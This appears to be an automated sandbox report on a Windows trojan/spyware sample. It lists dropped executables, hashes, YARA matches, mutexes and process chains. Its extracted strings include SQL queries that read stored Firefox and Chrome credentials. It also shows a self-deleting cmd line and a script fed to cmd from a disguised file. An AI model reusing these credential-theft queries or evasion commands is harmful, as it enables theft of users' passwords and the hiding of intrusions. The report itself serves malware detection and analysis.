Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 22_2_05A09946 SetLastError,SetWindowLongW,GetLastError,GetWindowLongW,NtdllDefWindowProc_W, 22_2_05A09946
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 22_2_05A09AC0 NtdllDefWindowProc_W, 22_2_05A09AC0
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 25_2_059D9946 SetLastError,SetWindowLongW,GetLastError,GetWindowLongW,NtdllDefWindowProc_W, 25_2_059D9946
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 25_2_059D9AC0 NtdllDefWindowProc_W, 25_2_059D9AC0
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\AppData\Local\Temp\Murano.exe Code function: 13_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx, 13_2_004038AF
Detected potential crypto function
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_0041609C 0_2_0041609C
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_004A12A9 0_2_004A12A9
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_004B94A5 0_2_004B94A5
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_004176A8 0_2_004176A8
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_004A79F2 0_2_004A79F2
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_004A0AA0 0_2_004A0AA0
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_00409DF0 0_2_00409DF0
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_004A7E56 0_2_004A7E56
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_0044D060 0_2_0044D060
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_0049E000 0_2_0049E000
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_0040E0E0 0_2_0040E0E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_0048D0F0 0_2_0048D0F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_004A80BB 0_2_004A80BB
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_00407150 0_2_00407150
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_00408160 0_2_00408160
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_0046C110 0_2_0046C110
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_0043A1D0 0_2_0043A1D0
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_004BC25E 0_2_004BC25E
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_0044F230 0_2_0044F230
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_004BE2ED 0_2_004BE2ED
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_004072F0 0_2_004072F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_004BC37E 0_2_004BC37E
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_00460310 0_2_00460310
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_004AE390 0_2_004AE390
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_004AC3BD 0_2_004AC3BD
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_00423440 0_2_00423440
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_0048F440 0_2_0048F440
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_0042B410 0_2_0042B410
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_00485410 0_2_00485410
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_00446422 0_2_00446422
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_0041D4D0 0_2_0041D4D0
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_00406550 0_2_00406550
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_0049C500 0_2_0049C500
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: 0_2_00487520 0_2_00487520
Source: C:\Users\user\AppData\Local\Temp\Murano.exe Code function: 13_2_0040737E 13_2_0040737E
Source: C:\Users\user\AppData\Local\Temp\Murano.exe Code function: 13_2_00406EFE 13_2_00406EFE
Source: C:\Users\user\AppData\Local\Temp\Murano.exe Code function: 13_2_004079A2 13_2_004079A2
Source: C:\Users\user\AppData\Local\Temp\Murano.exe Code function: 13_2_004049A8 13_2_004049A8
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_004158DD 16_2_004158DD
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_00438A70 16_2_00438A70
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_0043C169 16_2_0043C169
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_0043D29D 16_2_0043D29D
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_0043F3E9 16_2_0043F3E9
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_0043BC3E 16_2_0043BC3E
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_0043CD1D 16_2_0043CD1D
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_0043C6AD 16_2_0043C6AD
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_0043CF98 16_2_0043CF98
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_03F65B2D 16_2_03F65B2D
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Code function: 18_2_004053A7 18_2_004053A7
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Code function: 18_2_0040A800 18_2_0040A800
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Code function: 18_2_0040B0C0 18_2_0040B0C0
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Code function: 18_2_0040A140 18_2_0040A140
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Code function: 18_2_0040E970 18_2_0040E970
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Code function: 18_2_00418250 18_2_00418250
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Code function: 18_2_0040E208 18_2_0040E208
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Code function: 18_2_0040AA10 18_2_0040AA10
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Code function: 18_2_00418A21 18_2_00418A21
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Code function: 18_2_00418AFB 18_2_00418AFB
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Code function: 18_2_00409A90 18_2_00409A90
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Code function: 18_2_00409C50 18_2_00409C50
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Code function: 18_2_0040BC20 18_2_0040BC20
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Code function: 18_2_00416DCB 18_2_00416DCB
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Code function: 18_2_00418D93 18_2_00418D93
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Code function: 18_2_00413764 18_2_00413764
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 22_2_004158DD 22_2_004158DD
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 22_2_00438A70 22_2_00438A70
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 22_2_0043C169 22_2_0043C169
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 22_2_0043D29D 22_2_0043D29D
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 22_2_0043F3E9 22_2_0043F3E9
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 22_2_0043BC3E 22_2_0043BC3E
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 22_2_0043CD1D 22_2_0043CD1D
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 22_2_0043C6AD 22_2_0043C6AD
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 22_2_0043CF98 22_2_0043CF98
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 22_2_05A15B2D 22_2_05A15B2D
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 25_2_004158DD 25_2_004158DD
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 25_2_00438A70 25_2_00438A70
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 25_2_0043C169 25_2_0043C169
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 25_2_0043D29D 25_2_0043D29D
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 25_2_0043F3E9 25_2_0043F3E9
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 25_2_0043BC3E 25_2_0043BC3E
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 25_2_0043CD1D 25_2_0043CD1D
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 25_2_0043C6AD 25_2_0043C6AD
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 25_2_0043CF98 25_2_0043CF98
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: 25_2_059E5B2D 25_2_059E5B2D
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\lv[1].exe 826D2E8F10F6991F25DAE46522FB53D041A4D740C4AE0A8B570C41C099E9E31F
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\Murano.exe 826D2E8F10F6991F25DAE46522FB53D041A4D740C4AE0A8B570C41C099E9E31F
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\New Feature\4.exe 02F5996141F5FE2B189D8E2B1556EAB985E55E91D9F476DABC691F7C693B2400
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe 1A584D3F6C556EF5B10AEE7D057ADAB2EFFE774D1E85B19FF108899BC84371F3
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Code function: String function: 004033FF appears 45 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: String function: 00401120 appears 130 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: String function: 00421500 appears 65 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: String function: 00421E40 appears 112 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Code function: String function: 00405BC0 appears 100 times
Source: C:\Users\user\AppData\Local\Temp\Murano.exe Code function: String function: 004062CF appears 58 times
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: String function: 059DA650 appears 33 times
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: String function: 0040A400 appears 66 times
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: String function: 05A0A650 appears 33 times
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Code function: String function: 0040F159 appears 36 times
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: String function: 0040A400 appears 33 times
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: String function: 03F5A650 appears 33 times
PE file contains strange resources
Source: vpn.exe.13.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Sample file is different than original file name gathered from version info
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000002.395017335.0000000008770000.00000002.00000001.sdmp Binary or memory string: originalfilename vs SecuriteInfo.com.W32.AIDetect.malware1.24453.exe
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000002.395017335.0000000008770000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs SecuriteInfo.com.W32.AIDetect.malware1.24453.exe
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000002.384789346.0000000006210000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamechartv.dll.muij% vs SecuriteInfo.com.W32.AIDetect.malware1.24453.exe
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000002.394558547.0000000008680000.00000002.00000001.sdmp Binary or memory string: System.OriginalFileName vs SecuriteInfo.com.W32.AIDetect.malware1.24453.exe
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000002.384521726.00000000060A0000.00000002.00000001.sdmp Binary or memory string: OriginalFilenameSHELL32.DLL.MUIj% vs SecuriteInfo.com.W32.AIDetect.malware1.24453.exe
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000002.383911985.0000000005D10000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamemswsock.dll.muij% vs SecuriteInfo.com.W32.AIDetect.malware1.24453.exe
Uses 32bit PE files
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Yara signature match
Source: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
Source: 00000000.00000003.231267121.0000000005BE0000.00000004.00000001.sdmp, type: MEMORY Matched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
Source: 0.2.SecuriteInfo.com.W32.AIDetect.malware1.24453.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
Source: 0.2.SecuriteInfo.com.W32.AIDetect.malware1.24453.exe.5b00e50.5.unpack, type: UNPACKEDPE Matched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
Source: 0.2.SecuriteInfo.com.W32.AIDetect.malware1.24453.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
Source: 0.2.SecuriteInfo.com.W32.AIDetect.malware1.24453.exe.5b00e50.5.raw.unpack, type: UNPACKEDPE Matched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
Source: 0.3.SecuriteInfo.com.W32.AIDetect.malware1.24453.exe.5be0000.0.raw.unpack, type: UNPACKEDPE Matched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 4.exe.13.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: SmartClock.exe.16.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@41/35@5/3
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Code function: 18_2_00408E03 wvsprintfW,GetLastError,FormatMessageW,FormatMessageW,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,??2@YAPAXI@Z,lstrcpyW,lstrcpyW,lstrcpyW,??3@YAXPAX@Z,LocalFree, 18_2_00408E03
Source: C:\Users\user\AppData\Local\Temp\Murano.exe Code function: 13_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 13_2_004044D1
Source: C:\Users\user\AppData\Local\Temp\Murano.exe Code function: 13_2_004024FB CoCreateInstance, 13_2_004024FB
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Code function: 16_2_004017BA FindResourceW,LoadResource,LockResource,SizeofResource, 16_2_004017BA
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe File created: C:\Users\user\AppData\Roaming\Satir
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6964:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5568:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2900:120:WilError_01
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe Mutant created: \Sessions\1\BaseNamedObjects\{48D87B02-03F7-4188-8BE8-7733FF2CBCA6}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5696:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6988:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6808:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6788:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5188:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:852:120:WilError_01
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe File created: C:\Users\user\AppData\Local\Temp\tZVdZWix
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Binary or memory string: SELECT a11, a102 FROM nssPrivate;
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Binary or memory string: SELECT item1, item2 FROM metadata WHERE id = 'password';
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Binary or memory string: SELECT formSubmitURL, encryptedUsername, encryptedPassword FROM moz_logins;
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Virustotal: Detection: 30%
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe ReversingLabs: Detection: 33%
Source: unknown Process created: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe 'C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe'
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Process created: C:\Users\user\AppData\Local\Temp\Murano.exe 'C:\Users\user\AppData\Local\Temp\Murano.exe'
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /c rd /s /q C:\Users\user\AppData\Local\Temp\UdRFIiqEaRrk & timeout 3 & del /f /q 'C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Murano.exe Process created: C:\Users\user\AppData\Local\Temp\New Feature\4.exe C:\Users\user\AppData\Local\Temp\New Feature\4.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 3
Source: C:\Users\user\AppData\Local\Temp\Murano.exe Process created: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Process created: C:\Windows\SysWOW64\makecab.exe 'C:\Windows\System32\makecab.exe'
Source: C:\Windows\SysWOW64\makecab.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Process created: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Process created: C:\Windows\SysWOW64\makecab.exe 'C:\Windows\System32\makecab.exe'
Source: C:\Windows\SysWOW64\makecab.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Process created: C:\Windows\SysWOW64\makecab.exe 'C:\Windows\System32\makecab.exe'
Source: C:\Windows\SysWOW64\makecab.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Process created: C:\Windows\SysWOW64\makecab.exe 'C:\Windows\System32\makecab.exe'
Source: C:\Windows\SysWOW64\makecab.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Process created: C:\Windows\SysWOW64\makecab.exe 'C:\Windows\System32\makecab.exe'
Source: C:\Windows\SysWOW64\makecab.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe 'C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe'
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Process created: C:\Windows\SysWOW64\makecab.exe 'C:\Windows\System32\makecab.exe'
Source: C:\Windows\SysWOW64\makecab.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Process created: C:\Windows\SysWOW64\makecab.exe 'C:\Windows\System32\makecab.exe'
Source: C:\Windows\SysWOW64\makecab.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c C:\Windows\System32\cmd.exe < Scoprirvi.eps
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Process created: C:\Users\user\AppData\Local\Temp\Murano.exe 'C:\Users\user\AppData\Local\Temp\Murano.exe'
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /c rd /s /q C:\Users\user\AppData\Local\Temp\UdRFIiqEaRrk & timeout 3 & del /f /q 'C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe'
Source: C:\Users\user\AppData\Local\Temp\Murano.exe Process created: C:\Users\user\AppData\Local\Temp\New Feature\4.exe C:\Users\user\AppData\Local\Temp\New Feature\4.exe
Source: C:\Users\user\AppData\Local\Temp\Murano.exe Process created: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 3
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe Process created: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Process created: C:\Windows\SysWOW64\makecab.exe 'C:\Windows\System32\makecab.exe'
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Process created: C:\Windows\SysWOW64\makecab.exe 'C:\Windows\System32\makecab.exe'
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Process created: C:\Windows\SysWOW64\makecab.exe 'C:\Windows\System32\makecab.exe'
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe Process created: C:\Windows\SysWOW64\makecab.exe 'C:\Windows\System32\makecab.exe'
